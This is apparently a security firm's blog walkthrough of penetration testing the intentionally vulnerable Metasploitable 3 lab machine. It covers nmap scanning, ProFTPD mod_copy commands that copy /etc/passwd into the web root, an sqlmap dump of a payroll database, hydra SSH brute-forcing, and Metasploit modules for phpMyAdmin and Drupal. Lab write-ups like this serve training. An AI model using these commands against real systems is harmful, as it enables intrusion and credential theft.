Metasploitable 3 Walkthrough: Penetration Testing (Part 1)

Remote Code Execution Vulnerability in SOPlanning 1.52.01
January 3, 2025
An Introduction to Zero Day Attacks
An Introduction to Zero Day Attacks
January 7, 2025

January 3, 2025

Metasploitable3 is an updated version of Metasploitable2, developed to provide a more realistic environment for practicing advanced penetration testing techniques. This version introduces new vulnerabilities and services, offering a broader range of challenges for ethical hackers and security enthusiasts. Let’s explore what makes this version different and its key features!

Network Discovery 

Let’s first start with the NMAP to scan the network first.

Nmap: is (a network mapper tool) used to discover hosts, services, and vulnerabilities  and it’s one the essential tools for hackers and security workers 

sudo nmap -sV -sS 10.0.2.6

-sS: Stealth scan (SYN scan), detects open ports without completing the TCP handshake, making it faster and stealthier

-sV: Detects the version of services running on open ports.

This command is a quick scan targeting 10.0.2.6 to identify open ports and service versions. It focuses on commonly used ports, not all 65,535 ports.

Note: This quick scan does not cover all 65,535 ports. Since this is just a walkthrough and not an in-depth exploitation, a more comprehensive scan might be explored in a future series.

The Exploitation process

Port 21 ProFTPD 1.3.5

So, the vulnerability is on port 21. By accessing this port, it was identified that ProFTPD 1.3.5 contains a remote code execution (RCE) vulnerability via the mod_copy module, which allows attackers to execute code on the server, as demonstrated below

Manual Exploitation

First, connect to the port via the telnet 10.0.2.6 21 tool which it’s a command-line interface for communicating with remote devices or servers over a TCP/IP network and then site cpfr /etc/passwd

  • SITE: Initiates a server-specific command.
  • CPFR: Indicates the file to copy from (in this case, /etc/passwd).

So the structure of the command will be like this SITE CPTO /path/to/destination, site cpto /var/www/html/test.php to overwrite the test.php file

The test.php has been overwritten with the content of the /etc/passwd file 

As the picture below :

With the Metasploit

Setting the options as the below picture

And then, run the exploit

Apache httpd 2.4.7

Payroll_app

Payroll has SQL injection vulnerability type UNION SQL injection in the login page

As the below picture: by trying to manipulate the password parameters it shows it has SQL injection

so let’s pass it to Sqlmap and it’s and also so it’s specific the level and risk and the parameter by adding (“*”) to the password which is the vulnerable parameter as seen in the burp suite Repeater 

Using the Sqlmap tool 

sqlmap -r req.txt –dbms=”MySQL” –level=1 –risk=1 –dump –output-dir=output –batch

As the following picture:

–dbms : This specifies the target DBMS (Database Management System). In this case, SQLMap is instructed that the database is MySQL.

–level=1 : Defines the intensity of tests to perform. Level 1 is the lowest intensity, focusing on basic SQL injection tests.

–risk=1 : This defines the risk factor associated with the tests SQLMap will conduct. Risk 1 is the least aggressive and is generally used to avoid causing damage to the target system.

–dump : This option instructs SQLMap to dump (extract) the database content.

–output-dir=output : This specifies the directory where the results of the SQL injection tests will be saved.

–batch: This option runs SQLMap in batch mode, meaning it will automatically answer any prompts without requiring user interaction

The output result was users.csv and was contain the following

I have tried this user on SSH and it’s valid I have accounts on the server 

some of them are valid users using hydra

Phpmyadmin

This vulnerability is an authentication vulnerability and the password of Phpmyadmin was provided in the wiki 

Explaining the bug 

So setting the options to the port which was 80 and the TARGETURI /phpmyadmin/ with the password and the username root:sploitme

As you see in the below picture and run the exploit As we see we got a meterpreter shell 

Drupal

then the /drupal/

after running the directory fuzzing 

file that contains the version of Drupal

I have tried all the modules that related to this version but I realized it was a rabbit hole it wasn’t 7.5 because when i have tried Nmap scanning it was the version before 7.5  it was vulnerable to CVE-2014-3704 which affected only versions before 7.32

With The Metasploit, I have here found the drupageddon module for this CVE

After running the exploit we got the shell as below picture 

Conclusion

This Metasploitable 3 walkthrough highlights practical penetration testing techniques. Using tools like Nmap, Metasploit, Hydra, and SQLmap, we explored vulnerabilities in services like ProFTPD, Apache, and the Payroll app. By exploiting issues such as remote code execution and SQL injection, we demonstrated how attackers could gain access to systems. Tools like Telnet and Metasploit helped automate the process, while Hydra was used to brute-force SSH passwords. Overall, this exercise shows the importance of scanning for vulnerabilities and keeping software up to date to protect against attacks

Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Subscribe now to keep reading and get access to the full archive.

Continue reading

Enable Notifications OK No thanks